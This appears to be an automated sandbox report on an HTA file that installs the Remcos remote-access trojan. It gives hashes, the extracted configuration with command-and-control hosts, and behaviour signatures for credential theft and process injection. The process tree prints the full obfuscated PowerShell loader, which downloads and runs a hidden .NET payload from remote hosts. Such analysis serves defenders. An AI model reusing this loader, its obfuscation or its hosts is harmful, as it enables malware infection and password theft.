Analysis
max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags
arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted
11-11-2024 16:57
Static task
static1
Behavioral task
behavioral1
Sample
seethebestthingswithgoodthingswithgreatthignsfor.hta
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
seethebestthingswithgoodthingswithgreatthignsfor.hta
Resource
win10v2004-20241007-en
General
Target
seethebestthingswithgoodthingswithgreatthignsfor.hta
Size
281KB
MD5
b36b8c1d87172cd3d7646f53a58d4936
SHA1
f816a31bcb508052f54fa572eddf2e84ed7eef0c
SHA256
134d52fbb53944f8d09eb33663c83f406e5fa15996afe1bb7e95eeef99298821
SHA512
188c4f4b2a3e8659edf4fb88dd8cea3d91c3a44caa5b9350705393b65272538b63b581f6a044b2d24f74b1ba42cd2f9328e5253a690182235b093cd7ee57bf8e
SSDEEP
48:4FhWsTROELdn97g5un7MqnQKb4VwoIADQKp4VwoIA8S29++RWPi+8d6Ba5L1nNQk:43FZ97HnQ8iQsrkV8d6Ba1jQtQsMpQpQ
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Extracted
remcos
RemoteHost
shlobo.duckdns.org:9687
shlobo.duckdns.org:9374
shlobo.duckdns.org:8764
audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-U2TQ1C
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5
Signatures
Remcos family
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource | yara_rule
behavioral2/memory/4944-131-0x0000000000400000-0x0000000000462000-memory.dmp | Nirsoft
behavioral2/memory/1072-130-0x0000000000400000-0x0000000000478000-memory.dmp | Nirsoft
behavioral2/memory/4140-129-0x0000000000400000-0x0000000000424000-memory.dmp | Nirsoft
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource | yara_rule
behavioral2/memory/4944-131-0x0000000000400000-0x0000000000462000-memory.dmp | MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource | yara_rule
behavioral2/memory/1072-130-0x0000000000400000-0x0000000000478000-memory.dmp | WebBrowserPassView
Blocklisted process makes network request 3 IoCs
Processes: powerSHELl.eXE, powershell.exe
flow | pid | Process
15 | 3424 | powerSHELl.eXE
20 | 3228 | powershell.exe
25 | 3228 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes: powershell.exe, powershell.exe
pid | Process
1220 | powershell.exe
3228 | powershell.exe
Evasion via Device Credential Deployment 2 IoCs
Processes: powerSHELl.eXE, powershell.exe
pid | Process
3424 | powerSHELl.eXE
1528 | powershell.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: mshta.exe, WScript.exe
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | mshta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | WScript.exe
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes: CasPol.exe
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | CasPol.exe
Suspicious use of SetThreadContext 4 IoCs
Processes: powershell.exe, CasPol.exe
description | pid | Process | procid_target
PID 3228 set thread context of 1660 | 3228 | powershell.exe | 105
PID 1660 set thread context of 1072 | 1660 | CasPol.exe | 107
PID 1660 set thread context of 4944 | 1660 | CasPol.exe | 108
PID 1660 set thread context of 4140 | 1660 | CasPol.exe | 109
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes: powershell.exe, CasPol.exe, CasPol.exe, CasPol.exe, mshta.exe, WScript.exe, csc.exe, cvtres.exe, powershell.exe, CasPol.exe, powerSHELl.eXE, powershell.exe
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CasPol.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CasPol.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CasPol.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CasPol.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powerSHELl.eXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Modifies registry class 1 IoCs
Processes: powerSHELl.eXE
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | powerSHELl.eXE
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes: powerSHELl.eXE, powershell.exe, powershell.exe, powershell.exe, CasPol.exe, CasPol.exe
pid | Process
3424 | powerSHELl.eXE
3424 | powerSHELl.eXE
1528 | powershell.exe
1528 | powershell.exe
1220 | powershell.exe
1220 | powershell.exe
3228 | powershell.exe
3228 | powershell.exe
1072 | CasPol.exe
1072 | CasPol.exe
4140 | CasPol.exe
4140 | CasPol.exe
1072 | CasPol.exe
1072 | CasPol.exe
Suspicious behavior: MapViewOfSection 3 IoCs
Processes: CasPol.exe
pid | Process
1660 | CasPol.exe
1660 | CasPol.exe
1660 | CasPol.exe
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes: powerSHELl.eXE, powershell.exe, powershell.exe, powershell.exe, CasPol.exe
description | pid | Process
Token: SeDebugPrivilege | 3424 | powerSHELl.eXE
Token: SeDebugPrivilege | 1528 | powershell.exe
Token: SeDebugPrivilege | 1220 | powershell.exe
Token: SeDebugPrivilege | 3228 | powershell.exe
Token: SeDebugPrivilege | 4140 | CasPol.exe
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: CasPol.exe
pid | Process
1660 | CasPol.exe
Suspicious use of WriteProcessMemory 43 IoCs
Processes: mshta.exe, powerSHELl.eXE, csc.exe, WScript.exe, powershell.exe, powershell.exe, CasPol.exe
description | pid | Process | procid_target
PID 3912 wrote to memory of 3424 | 3912 | mshta.exe | 86
PID 3912 wrote to memory of 3424 | 3912 | mshta.exe | 86
PID 3912 wrote to memory of 3424 | 3912 | mshta.exe | 86
PID 3424 wrote to memory of 1528 | 3424 | powerSHELl.eXE | 88
PID 3424 wrote to memory of 1528 | 3424 | powerSHELl.eXE | 88
PID 3424 wrote to memory of 1528 | 3424 | powerSHELl.eXE | 88
PID 3424 wrote to memory of 1068 | 3424 | powerSHELl.eXE | 94
PID 3424 wrote to memory of 1068 | 3424 | powerSHELl.eXE | 94
PID 3424 wrote to memory of 1068 | 3424 | powerSHELl.eXE | 94
PID 1068 wrote to memory of 3448 | 1068 | csc.exe | 95
PID 1068 wrote to memory of 3448 | 1068 | csc.exe | 95
PID 1068 wrote to memory of 3448 | 1068 | csc.exe | 95
PID 3424 wrote to memory of 4532 | 3424 | powerSHELl.eXE | 98
PID 3424 wrote to memory of 4532 | 3424 | powerSHELl.eXE | 98
PID 3424 wrote to memory of 4532 | 3424 | powerSHELl.eXE | 98
PID 4532 wrote to memory of 1220 | 4532 | WScript.exe | 99
PID 4532 wrote to memory of 1220 | 4532 | WScript.exe | 99
PID 4532 wrote to memory of 1220 | 4532 | WScript.exe | 99
PID 1220 wrote to memory of 3228 | 1220 | powershell.exe | 101
PID 1220 wrote to memory of 3228 | 1220 | powershell.exe | 101
PID 1220 wrote to memory of 3228 | 1220 | powershell.exe | 101
PID 3228 wrote to memory of 1660 | 3228 | powershell.exe | 105
PID 3228 wrote to memory of 1660 | 3228 | powershell.exe | 105
PID 3228 wrote to memory of 1660 | 3228 | powershell.exe | 105
PID 3228 wrote to memory of 1660 | 3228 | powershell.exe | 105
PID 3228 wrote to memory of 1660 | 3228 | powershell.exe | 105
PID 3228 wrote to memory of 1660 | 3228 | powershell.exe | 105
PID 3228 wrote to memory of 1660 | 3228 | powershell.exe | 105
PID 3228 wrote to memory of 1660 | 3228 | powershell.exe | 105
PID 3228 wrote to memory of 1660 | 3228 | powershell.exe | 105
PID 3228 wrote to memory of 1660 | 3228 | powershell.exe | 105
PID 1660 wrote to memory of 1072 | 1660 | CasPol.exe | 107
PID 1660 wrote to memory of 1072 | 1660 | CasPol.exe | 107
PID 1660 wrote to memory of 1072 | 1660 | CasPol.exe | 107
PID 1660 wrote to memory of 1072 | 1660 | CasPol.exe | 107
PID 1660 wrote to memory of 4944 | 1660 | CasPol.exe | 108
PID 1660 wrote to memory of 4944 | 1660 | CasPol.exe | 108
PID 1660 wrote to memory of 4944 | 1660 | CasPol.exe | 108
PID 1660 wrote to memory of 4944 | 1660 | CasPol.exe | 108
PID 1660 wrote to memory of 4140 | 1660 | CasPol.exe | 109
PID 1660 wrote to memory of 4140 | 1660 | CasPol.exe | 109
PID 1660 wrote to memory of 4140 | 1660 | CasPol.exe | 109
PID 1660 wrote to memory of 4140 | 1660 | CasPol.exe | 109
Processes
Process (level 1): C:\Windows\SysWOW64\mshta.exe
Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgoodthingswithgreatthignsfor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3912
Process (level 2): C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE
Command line: "C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE" "poWERSheLL.ExE -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT ; IeX($(IeX('[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8.GetStRing([sYSTEm.coNverT]'+[chaR]0x3A+[chaR]58+'froMbase64String('+[cHAR]0x22+'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'+[cHar]34+'))')))"
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3424
Process (level 3): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
Process (level 3): C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ttk1ndd0\ttk1ndd0.cmdline"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1068
Process (level 4): C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9664.tmp" "c:\Users\Admin\AppData\Local\Temp\ttk1ndd0\CSCD13CE69C3ABA435D9E52E09D9D384042.TMP"
- System Location Discovery: System Language Discovery
PID:3448
Process (level 3): C:\Windows\SysWOW64\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs"
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4532
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQc2hPTWVbNF0rJHBzSG9tRVszMF0rJ3gnKSggKCgnQU04aW1hZ2VVcmwgPSB5OWNuaHR0cHM6Ly8xMDE3LmZpbGVtJysnYWlsLmNvbS9hJysncGkvZicrJ2lsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDdCVTEnKydrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY18nKydUMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiB5OWNuO0FNOHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7QU04aW1hZ2VCeXRlcyA9IEFNJysnOHdlYkNsaWVudC5Eb3dubG9hZERhdGEoQU04aW1hZ2UnKydVcmwpO0FNOGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEFNJysnOGltYWdlQnl0ZScrJ3MpO0FNOHN0YXJ0RmxhZyA9IHk5Y248PCcrJ0JBU0U2NF9TVEFSVD4+eTljbjtBTThlbmRGbGFnJysnID0geTljbjw8QkEnKydTRTY0JysnX0VORD4+eTljbjtBTThzdGFydEluZGV4ID0gQScrJ004aW1hZ2VUZXh0LicrJ0luJysnZGV4T2YoQU04c3RhcnRGbGFnJysnKTtBJysnTThlbmRJbmRleCA9IEFNOGltYWdlVGV4dC5JbmRleE9mKEFNOGVuZEZsYWcpO0FNOHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBBTThlbmRJbmRleCAtZ3QgQU04c3RhcnRJbicrJ2QnKydleDtBTThzdGFydEluZGV4ICs9IEFNOHN0YXJ0RmxhZy5MZScrJ25ndCcrJ2g7QU04YmFzZTY0TGVuZ3RoID0gQU04ZW5kSW5kZXggLSBBTThzdGFydEluZGV4JysnO0FNOGJhc2U2NENvbW1hbmQgPSBBTThpbWFnZVRleHQuU3ViJysnc3RyaScrJ25nKEFNOHN0YXJ0SW5kZXgsIEFNOGJhc2U2NExlbmd0aCk7JysnQU04JysnYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoQU04YmFzZTY0Q29tbWFuZC4nKydUb0NoYXJBcnJheSgpIFBNVzYgRm9yRWFjaC1PYmplY3QgeyBBTThfIH0pWy0xLi4tKEFNOGJhc2UnKyc2NENvbW1hbmQuTGVuZ3RoKV07JysnQU0nKyc4Y29tbWFuJysnZEJ5dGVzID0gW1MnKyd5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhBTThiYXNlNjRSZXZlcnNlZCk7QU04bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEFNOGNvbW1hbmRCeXRlcyk7QU04dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh5OWNuVkFJeTljbik7QU04dmFpTWV0aG9kLkknKydudm9rZShBTThudWxsLCBAKHk5Y250eHQuRVJGVkdSRkUvNTMvMjkxLjg3MS42NC44OTEvLzpwdHRoeTljbiwgeTljbmRlc2F0JysnaXZhZG95OWNuLCB5OWNuZGVzYXRpdmFkb3k5Y24nKycsIHk5Y25kZXNhdGl2YWRveTljbiwgeTljbkNhc1BvbHk5YycrJ24sIHk5Y25kZXNhdGl2YWRveScrJzljbiwgeTljbmRlc2F0aXZhZG95OWNuLHk5Y25
kZXNhdGl2YWRveTljJysnbix5OWNuZGVzYXRpdmFkb3k5Y24seTljbmRlc2F0aXZhZG95OWNuLHk5JysnY25kZXNhdGl2YWRveTljbix5OWNuZGVzYXQnKydpdmFkb3k5Y24seTljbjF5OWNuLHk5Y25kZXNhdGl2YWRveTljbikpOycpICAtY1JlcGxBY2UnUE1XNicsW0NoQVJdMTI0ICAtY1JlcGxBY2UoW0NoQVJdMTIxK1tDaEFSXTU3K1tDaEFSXTk5K1tDaEFSXTExMCksW0NoQVJdMzktcmVQTEFjZShbQ2hBUl02NStbQ2hBUl03NytbQ2hBUl01NiksW0NoQVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1220
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PshOMe[4]+$psHomE[30]+'x')( (('AM8imageUrl = y9cnhttps://1017.filem'+'ail.com/a'+'pi/f'+'ile/get?filekey=2Aa_bWo9Reu45t7BU1'+'kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_'+'T35w&pk_vid=fd4f614bb209c62c1730945176a0904f y9cn;AM8webClient = New-Object System.Net.WebClient;AM8imageBytes = AM'+'8webClient.DownloadData(AM8image'+'Url);AM8imageText = [System.Text.Encoding]::UTF8.GetString(AM'+'8imageByte'+'s);AM8startFlag = y9cn<<'+'BASE64_START>>y9cn;AM8endFlag'+' = y9cn<<BA'+'SE64'+'_END>>y9cn;AM8startIndex = A'+'M8imageText.'+'In'+'dexOf(AM8startFlag'+');A'+'M8endIndex = AM8imageText.IndexOf(AM8endFlag);AM8startIndex -ge 0 -and AM8endIndex -gt AM8startIn'+'d'+'ex;AM8startIndex += AM8startFlag.Le'+'ngt'+'h;AM8base64Length = AM8endIndex - AM8startIndex'+';AM8base64Command = AM8imageText.Sub'+'stri'+'ng(AM8startIndex, AM8base64Length);'+'AM8'+'base64Reversed = -join (AM8base64Command.'+'ToCharArray() PMW6 ForEach-Object { AM8_ })[-1..-(AM8base'+'64Command.Length)];'+'AM'+'8comman'+'dBytes = [S'+'ystem.Convert]::FromBase64String(AM8base64Reversed);AM8loadedAssembly = [System.Reflection.Assembly]::Load(AM8commandBytes);AM8vaiMethod = [dnlib.IO.Home].GetMethod(y9cnVAIy9cn);AM8vaiMethod.I'+'nvoke(AM8null, @(y9cntxt.ERFVGRFE/53/291.871.64.891//:ptthy9cn, y9cndesat'+'ivadoy9cn, y9cndesativadoy9cn'+', y9cndesativadoy9cn, y9cnCasPoly9c'+'n, y9cndesativadoy'+'9cn, y9cndesativadoy9cn,y9cndesativadoy9c'+'n,y9cndesativadoy9cn,y9cndesativadoy9cn,y9'+'cndesativadoy9cn,y9cndesat'+'ivadoy9cn,y9cn1y9cn,y9cndesativadoy9cn));') -cReplAce'PMW6',[ChAR]124 -cReplAce([ChAR]121+[ChAR]57+[ChAR]99+[ChAR]110),[ChAR]39-rePLAce([ChAR]65+[ChAR]77+[ChAR]56),[ChAR]36) )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228
Process (level 6): C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1660
Process (level 7): C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\oqamudsefzxubcffwstba"
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1072
Process (level 7): C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zkgeuvdxthpzlqtrncnddmlm"
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4944
Process (level 7): C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\bmtxvoorhphmowpvxnaworgvzeps"
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4140
Network
MITRE ATT&CK Enterprise v15
Downloads